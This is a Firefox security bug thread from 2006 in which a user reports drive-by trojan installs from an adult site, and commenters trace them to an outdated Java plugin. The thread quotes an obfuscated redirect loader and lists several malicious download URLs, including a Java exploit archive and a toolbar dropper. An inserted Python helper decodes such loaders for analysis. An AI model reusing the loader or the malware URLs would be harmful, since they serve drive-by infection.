Closed
Bug 337768
Opened 18 years ago
Closed 18 years ago
Active exploit that installs trojan on ff 1.5.3
Categories
(Firefox :: Security, defect)
RESOLVED
INVALID
People
(Reporter: rene, Unassigned)
Attachments
(1 file)
24.20 KB, text/html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3

Navigating to this URL with ff 1.5.3 will install one or multiple trojans, reason unknown but the virus scanner alerts, placing arbitrary executables in the \windows\system32 directory. It redirects the user before or afterwards. Reproducible on my system.

Reproducible: Always

Steps to Reproduce:
1. navigate to http://c-erotica.cumswap.net/ with ff 1.5.3
2. watch your virus scanner detect trojans.
3.

Actual Results:
AVG pops up offering to quarantine the trojan.

Expected Results:
-

Accidental discovery, reproducible.
Comment 1•18 years ago
page loads: http://teenboat.sexy-teen-girls-free-porn-pics.biz/src.js
contains:
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%27%6A%61%76%61%73%63%72%69%70%74%27%3E%0D%0A%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%65%2D%6F%72%67%61%73%6D%2E%6F%72%67%2F%73%65%78%2E%68%74%6D%6C%22%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E%0D%0A'))
decodes as:
<script language='javascript'>
window.location.href="http://www.e-orgasm.org/sex.html";
</script>
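An added analysis helper, not code from the bug or any of its commenters: it decodes a document.write(unescape('...')) wrapper the way the legacy JavaScript unescape() does (%XX and %uXXXX, malformed sequences left alone), peels nested layers, and lists the redirect targets so a capture like the one above can be triaged without executing it. The encoded string is the one quoted in comment 1; the function names and the regexes are assumptions of this example.

```python
import re

# Constructed copy of the loader quoted in comment 1 (the only value taken
# from the bug); everything below it is an added helper, not the page's code.
SRC_JS = ("document.write(unescape('"
          "%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%27%6A%61"
          "%76%61%73%63%72%69%70%74%27%3E%0D%0A%77%69%6E%64%6F%77%2E%6C"
          "%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%3A%2F"
          "%2F%77%77%77%2E%65%2D%6F%72%67%61%73%6D%2E%6F%72%67%2F%73%65"
          "%78%2E%68%74%6D%6C%22%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E%0D"
          "%0A'))")

# document.write(unescape('<payload>')) with either quote style, any spacing.
DOCWRITE_RE = re.compile(
    r"""document\.write\(\s*unescape\(\s*(['"])(.*?)\1\s*\)\s*\)""", re.S)
# window.location / location.href style assignments of a quoted URL.
REDIRECT_RE = re.compile(
    r"""(?:window\.|top\.|self\.)?location(?:\.href)?\s*=\s*(['"])(.*?)\1""")


def js_unescape(s: str) -> str:
    """Mimic legacy JavaScript unescape(): %uXXXX -> UTF-16 code unit,
    %XX -> Latin-1 character; anything malformed is returned untouched."""
    def repl(m: re.Match) -> str:
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})", repl, s)


def decode_docwrite_layers(js: str, max_depth: int = 5) -> list:
    """Peel nested document.write(unescape('...')) wrappers and return each
    decoded layer in order; the last element is the innermost plaintext."""
    layers, cur = [], js
    for _ in range(max_depth):          # depth cap guards against loops
        m = DOCWRITE_RE.search(cur)
        if not m:
            break
        cur = js_unescape(m.group(2))
        layers.append(cur)
    return layers


def extract_redirects(js: str) -> list:
    """Collect every location/location.href target found in the raw script
    and in each decoded layer, in the order they would take effect."""
    found = []
    for layer in [js] + decode_docwrite_layers(js):
        found += [m.group(2) for m in REDIRECT_RE.finditer(layer)]
    return found


if __name__ == "__main__":
    for i, layer in enumerate(decode_docwrite_layers(SRC_JS), 1):
        print(f"--- layer {i} ---\n{layer}")
    print("redirects:", extract_redirects(SRC_JS))
```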
Reporter
Comment 2•18 years ago
Agreed, trojan also installs when going to http://www.e-orgasm.org/sex.html I've made a log with ethereal, not sure where to put it.
Comment 3•18 years ago
René, can you type about:plugins into the url bar, do File->Save Page As (Web Page Complete), then attach the page here? thanks.
Reporter
Comment 4•18 years ago
as requested
Comment 5•18 years ago
What are the names of the trojans?
Comment 6•18 years ago
windows defender didn't catch anything after loading http://www.e-orgasm.org/sex.html in the test I just ran.
Comment 7•18 years ago
According to the attachment in comment 4, you're using Java 1.4.1_03. Bug 271559, filed in 2004, mentions active exploits against Java versions lower than 1.4.2_06. I bet the site is exploiting a security hole in the old version of Java you have. If you're feeling brave, want to disable/uninstall Java and try again, or update your Java VM and try again?
Comment 8•18 years ago
René, actually most of your plugins are out of date and have been superseded by later versions which incorporate fixes for security issues. Please update _all of your plugins_ as soon as possible, clean your system and try again.
Reporter
Comment 9•18 years ago
Hi,
Well, I have 5 extensions installed (DOM Inspector, Talkback, Adblock, StumbleUpon, Live HTTP Headers). StumbleUpon was indeed out of date, I upgraded. I checked the system with Hitman Pro, AVG is running, the system should be clean. Trojan horse name (one of them) is Dropper.Small.8.BT according to AVG.
Comment 10•18 years ago
Actually, I meant plugins. Hopefully I am up to date. To compare yours with mine:
yours: QuickTime Plug-in 7.0.3 / mine: QuickTime Plug-in 7.0.4
yours: Real 6.0.12.1465 / mine: Real 6.0.12.1483
yours: Shockwave Flash 8.0 r22 / mine: Shockwave Flash 8.0 r24
yours: Java Plug-in 1.4.1_03 / mine: Java Plug-in 1.5.0_06
Comment 11•18 years ago
crap, QuickTime 7.0.4 is now out of date, get the latest 7.1 from <http://www.apple.com/support/downloads/>.
Comment 12•18 years ago
www.e-orgasm.org/sex.html loads/attempts lots of crap, which is generally how these "free" sites pay for themselves. Are you confident you can stay ahead of the hackers? Note that Anti-Virus won't save you: they only detect the bad stuff they've already discovered, which by definition means there's a window of time between when the bad guys start using a new trick and when the AV products start detecting it.

One thing it loads is detected as Trojan.ByteVerify (an old Java exploit, almost guaranteed to be present on these kinds of sites): http://www.awmdabest.com/tjar/364/ns/archive.jar

It also includes a script from http://install.xxxtoolbar.com/ that tries tons of tricks, mostly IE. Starting with a simple plea "Clean OK then Yes to Install" http://www.tbcode.com/ist/softwares/v4.0/0006_regular.cab -- no other reason given, just to see how gullible people are I guess. xxxtoolbar.com has a flash movie called toolbarcash.swf with the associated text "For Easy Installation of SlotchBar". It scans clean, but I didn't run it to see what it tried to load into the associated iframe. A couple more attempts run the tbcode.com ActiveX from above.

Loads an adultfriendfinder.com frame which looked safe as far as I could tell. heh: "The individuals appearing in this advertisement may not be actual Adult FriendFinder members." I'm sure they're not.

This looks like the old Java exploit (which is a downloader, the actual payload differs from site to site). I'm slightly suspicious of the flash since that's going around too, but this particular one seemed to scan clean.
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago
Depends on: startpagewarning
Resolution: --- → INVALID
Reporter
Comment 13•18 years ago
Disabling Java indeed stops the system from being infected. An outdated Java probably is the vector. Which makes me wonder.. I am one of the users that nicely applies when some software mentions there is a new version, and have done so in the past several times for Java. But.. at this very moment, Java (even when loaded with ff) does not mention an update, btw neither does Flash or QT.

I am not sure how this mechanism is supposed to work (i.e. will the autoupdate only get triggered with ff running and having the plugin loaded?), and worse, I cannot find _any_ option to manually update Java, since it is not in the start menu, the tray icon that shows up after running some Java app isn't of help either, the ff menu does not show some plugin config or 'check for updates' (besides the extensions), so apparently I am dependent on the auto-update mechanism of the plugin author?...

So, what steps were actually expected from me, as user, to fix or prevent this? I am obviously missing something here. So far, my best solution is to just disable Java.
Reporter
Comment 14•18 years ago
An addition to this Java thing: according to Control Panel/Software, J2SE RE 5.0 Update 6 (1.5.0_06, right?) is nicely installed. J2SE 1.4.1 seems _not_ installed, however that appears to be the version launched with ff. I have updated ff in the past, several times, so probably this Java 1.4 just kept "sleeping". I went to ff_install_dir\plugins\ and removed any dll that had to do with Java. After an ff restart, indeed now Java 1.5 is launched (and the issue is solved).

So after all, the issue appears to be: the Java 1.4 plugin hanging around with ff, even after uninstall(?), and getting launched by default even if Java 1.5 is installed. Should I file a new bug report for that? ;)

Many thanks for the help from you guys, and I am glad it was not ff itself.
Comment 15•18 years ago
Looking at your plugin list it appears you have both Java 1.4.1_03 and Java 1.5.0_06 installed. I wonder if the Java 1.5.0 installer didn't clean out the old plugin version from Firefox's installation directory. That is not good.
Reporter
Comment 16•18 years ago
Well, Java 1.5.0_06 is not in the plugins directory; I looked for it and the dlls (same names as the 1.4.1 ones I dropped from the plugin dir) are in "program files\java\jre1.5.0_06\bin". Not sure how ff detects this, but I _think_ putting them in the plugins dir was the old method, looking into the registry for the Java location is the new method. And (I think) plugins in the ff plugin directory apparently get priority above a Java installation in another directory. My current system is about 10 months old, afaik it only ran ff 1.0 and up, not 0.9.